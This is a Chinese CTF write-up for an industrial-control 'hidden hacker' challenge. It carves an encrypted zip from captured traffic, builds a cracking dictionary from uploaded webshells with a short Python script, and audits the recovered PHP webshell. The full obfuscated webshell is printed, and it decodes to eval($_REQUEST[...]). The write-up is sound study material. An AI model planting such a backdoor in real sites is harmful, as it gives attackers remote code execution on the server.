工控CTF_纵横网络靶场_隐藏的黑客

简介: 工控CTF_纵横网络靶场_隐藏的黑客

题目地址

https://game.fengtaisec.com/#/startQuestions/9

640.png


题目分析

根据情报得知工控现场发现某SCADA系统被黑客攻破,附件为黑客在目录留下的文件和当时时间段捕获到的一部分流量包,你能根据这些信息分析出蛛丝马迹来么flag形式为 flag{}。

关键字:捕获到的一部分流量包,你能根据这些信息分析    目录留下的文件


解题思路


下载文件,有一个upload目录 ,里面全是shell

640.png

640.png

还有一个流量包  打开

查找 flag、png、webshell等关键字,在查找webshell关键字时发现有个流量包里有个webshell.php,数据包里还有 pk开头的,说明存在zip文件

直接原始数据显示,将蓝色部分复制

076d660d6c29e78b6de1e2a149dcc453.png


使用010 Editor 新建一个16进制文件,将原始数据导入,保存为hack.zip文件

49444223f3b50cae4a53b5f94b2f9f1f.png

文件加密了需要解密,通过zip爆破工具进行暴力破解,爆破无果

upload目录下有很多php文件,获取upload文件中每个webshell的登陆密码进行爆破

python脚本收集脚本


import reimport os
passwd=[]s= os.listdir('./upload')for i in s:    f = open('upload/'+i,'r').read()    find=re.findall(r"\[(.*?)]",f)    find_1=' '.join(find)    passwd.append(find_1)p = open('passwd.txt', 'w')for lb in passwd:    p.write(lb + '\n')

得到密码文件

3d35ca6b082161dc66e74009589e66cf.png

使用zip爆破工具进行字典攻击 使用我们收集到的字典

85eece13b199b972c93445092d1cb534.png

爆破出解压密码为:7b8b965ad4bca

解压得到一个webshell.php,直接运行没有flag,需要进行审计


<?php error_reporting(0); @$c = array("1JFUVVFU1RbJzlhNzJjM","2Q1ZTc0ZjYwNTFiYjNiMzU","5MGZhOTMxOWZlJ10pOw","MGZhOTMxOWZlJ","MGZhOTMxOWZlJ");@$str="ZXZhbCgkX";@$o0o00o00o00o0o0 = chr(97).chr(115).chr(115).chr(101).chr(114).chr(116);#$o0o00o00o00o0o0 = assert@$ooo00o0o0o0o0o0 = chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99).chr(111).chr(100).chr(101);#$ooo00o0o0o0o0o0 = base64_decode@$count = 0;for($x=0;$x<=9;$x++){#0,1,2        if (in_array($x, @$c)){                @$str=@$str.@$c[@$count];#拼接三次                if ($count == 2)#循环三次                {                               @$o0o00o00o00o0o0(@$ooo00o0o0o0o0o0(@$str));                        #assert(base64_decode(ZXZhbCgkX1JFUVVFU1RbJzlhNzJjM2Q1ZTc0ZjYwNTFiYjNiMzU5MGZhOTMxOWZlJ10pOw))                        #assert(base64_decode(eval($_REQUEST['9a72c3d5e74f6051bb3b3590fa9319fe']);))                }                @$count++;        }}?>

直接echo输出@$o0o00o00o00o0o0(@$ooo00o0o0o0o0o0(@$str))

得到


@assert(@base64_decode(@ZXZhbCgkX1JFUVVFU1RbJzlhNzJjM2Q1ZTc0ZjYwNTFiYjNiMzU5MGZhOTMxOWZlJ10pOw))

进行base64解密 得到flag

base64在线解密:https://www.qqxiuzi.cn/bianma/base64.htm

4ef523cb2db2c89cf8cc2dc9a7b8d21e.png


flag{9a72c3d5e74f6051bb3b3590fa9319fe}

相关文章
|
5月前
|
存储 安全 网络安全
网络安全纵横谈:漏洞、加密与意识的三维防护网
【2月更文挑战第30天】在数字化时代,网络安全已成为维系信息完整性、确保用户隐私和保障企业资产的关键。本文深入探讨了网络安全领域中的三个核心议题:网络漏洞的挖掘与防御策略、加密技术的最新进展以及提升个体和企业的安全意识。通过对这些议题的分析,旨在为读者提供一个全面的网络安全知识框架,帮助构建更为坚固的信息防线。
|
5月前
|
SQL 运维 安全
黑客(网络安全)技术自学——高效学习
黑客(网络安全)技术自学——高效学习
61 1
|
5月前
|
网络安全 数据安全/隐私保护 Python
[网络安全/CTF]护网杯 2018 easy_tornado 解题详析(Tornado之SSTI注入)
[网络安全/CTF]护网杯 2018 easy_tornado 解题详析(Tornado之SSTI注入)
100 0
|
2月前
|
XML SQL 安全
【网络安全】Web Hacking网络黑客手册,GitHub星标3.7K!
在黑客攻击的演变过程中,防火墙只是一个减速带。黑客攻击不断发展,变得越来越复杂,适应能力和创造力都在不断增强,造成的破坏也越来越大。通过网络端口进行的 Web 攻击影响巨大。 今天给小伙伴们分享的这份手册主要讲解了Web黑客攻击方向。描述了 Web 语言和协议、Web 和数据库服务器以及支付系统。介绍了完整的方法论,包括技术和攻击、对策、工具,以及案例研究和 Web 攻击场景,展示了不同攻击的工作原理及其工作原理。
|
3月前
|
安全 Linux 网络安全
自学黑客(网络安全)
【7月更文挑战第18天】
50 5
|
4月前
|
SQL 安全 网络安全
网络安全攻防实战:黑客与白帽子的较量
【6月更文挑战第29天】网络安全战场,黑客与白帽子的博弈日益激烈。黑客利用漏洞扫描、DDoS、SQL注入等手段发起攻击,而白帽子则通过防火墙、入侵检测、数据加密等技术防守。双方在技术与智慧的较量中,未来将更多融入AI、区块链等先进技术,提升攻防效率与安全性。面对网络威胁,提升技能与意识至关重要。
|
4月前
|
存储 网络协议 数据建模
程序与技术分享:2021年第一届“东软杯”网络安全CTF竞赛
程序与技术分享:2021年第一届“东软杯”网络安全CTF竞赛
|
5月前
|
存储 安全 算法
网络安全纵横谈:漏洞、加密与意识的三维防护
【5月更文挑战第26天】在数字化浪潮不断涌动的当下,网络安全已成为维护信息完整性、确保数据流通安全的关键。本文将深入探讨网络安全领域内的三个核心议题:网络漏洞挖掘与防御机制、现代加密技术的应用及其挑战、以及提升个体和企业的安全意识。通过对这些方面的分析,旨在为读者提供一个全面而深入的视角,以理解和应对日益复杂的网络安全威胁。
|
5月前
|
安全 网络安全 数据安全/隐私保护
网络安全:如何保护你的网络不受黑客攻击
【5月更文挑战第10天】 网络安全摘要:强化密码安全,使用防病毒软件,启用防火墙,定期更新软件,使用安全网络连接,备份重要数据,提高安全意识。这七大措施助你构建安全网络环境,抵御黑客攻击。记得持续学习,适应不断变化的威胁。
|
4月前
|
安全 网络安全 数据安全/隐私保护
CTF竞赛:一场网络安全技术的盛宴
CTF竞赛:一场网络安全技术的盛宴
121 0
下一篇
无影云桌面